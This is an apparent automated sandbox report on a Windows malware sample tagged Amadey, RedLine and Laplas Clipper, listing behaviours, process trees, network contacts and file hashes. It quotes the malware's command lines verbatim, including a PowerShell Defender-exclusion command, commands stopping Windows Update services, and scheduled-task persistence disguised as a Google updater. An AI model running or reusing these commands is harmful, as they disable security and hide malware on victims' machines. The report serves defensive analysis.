Malware Analysis Report

2024-10-19 01:10

Sample ID 230801-3r92fsbg67
Target 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
Tags
amadey laplas redline clipper evasion infostealer persistence stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847

Threat Level: Known bad

The file 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe was found to be: Known bad.

Malicious Activity Summary

amadey laplas redline clipper evasion infostealer persistence stealer themida trojan

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Laplas Clipper

RedLine payload

RedLine

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Loads dropped DLL

Themida packer

Executes dropped EXE

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

GoLang User-Agent

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-01 23:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-01 23:46

Reported

2023-08-01 23:48

Platform

win7-20230712-en

Max time kernel

59s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe | N/A

Stops running service(s)

evasion

Themida packer

themida

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 840 set thread context of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

GoLang User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2204 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1272 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\schtasks.exe
PID 1272 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\cmd.exe
PID 1272 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2536 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2940 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2952 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2952 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2976 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 2976 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 2996 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cacls.exe
PID 1272 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1272 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 840 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\SysWOW64\WerFault.exe
PID 840 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe | C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 1892 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1272 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1272 wrote to memory of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe | C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 36

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\system32\taskeng.exe

taskeng.exe {711DAF88-722F-4BCC-8C50-64543DFFCBB9} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {3A18D9A7-9B42-40AB-AD7D-16FDB4AF1E6A} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network

Country | Destination | Domain | Proto
NL | 45.15.156.208:80 | 45.15.156.208 | tcp
US | 8.8.8.8:53 | second.amadgood.com | udp
NL | 194.180.49.153:80 | 194.180.49.153 | tcp
US | 206.189.229.43:80 | 206.189.229.43 | tcp
SG | 128.199.192.86:81 |  | tcp
US | 8.8.8.8:53 | api.ip.sb | udp
US | 172.67.75.172:443 | api.ip.sb | tcp
US | 8.8.8.8:53 | xmr.2miners.com | udp
DE | 162.19.139.184:12222 | xmr.2miners.com | tcp

Files

memory/2204-54-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-57-0x0000000000F90000-0x0000000001A31000-memory.dmp

memory/2204-56-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-59-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2204-61-0x0000000000F90000-0x0000000001A31000-memory.dmp

memory/2204-62-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/2204-65-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2204-74-0x0000000000F90000-0x0000000001A31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1272-78-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1272-79-0x0000000000110000-0x0000000000111000-memory.dmp

memory/1272-82-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1272-84-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/1272-81-0x0000000000110000-0x0000000000111000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\014134971248

MD5 16895764e0a96a72015b4e5402ee185c
SHA1 8124725156ce79aafe2a008134ed3c966fc8b961
SHA256 f61263093b51ac102308dfc926ac63b529ccffeb260dc20437533c80e2fba46d
SHA512 7dcb5acf20b6c6abb0569b804413ccb89451a04fc74356bdeb33fc89069e7a5b198bcac524943fc2a3576f7eb548be38849208b949181fd1fa62e76c8b60941b

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

memory/1272-116-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/840-117-0x0000000000170000-0x000000000032F000-memory.dmp

memory/2044-118-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2044-119-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2044-123-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2044-125-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2044-126-0x0000000000400000-0x000000000045A000-memory.dmp

